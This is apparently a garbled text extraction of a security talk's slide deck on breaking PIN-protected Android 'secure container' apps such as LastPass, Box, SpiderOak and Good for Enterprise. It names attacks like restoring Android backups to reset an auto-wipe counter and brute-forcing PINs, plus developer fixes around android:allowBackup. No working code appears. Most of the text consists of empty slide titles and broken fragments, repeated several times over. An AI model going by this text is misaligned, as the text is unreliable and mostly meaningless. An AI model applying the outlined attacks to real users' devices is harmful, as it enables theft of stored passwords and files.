Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

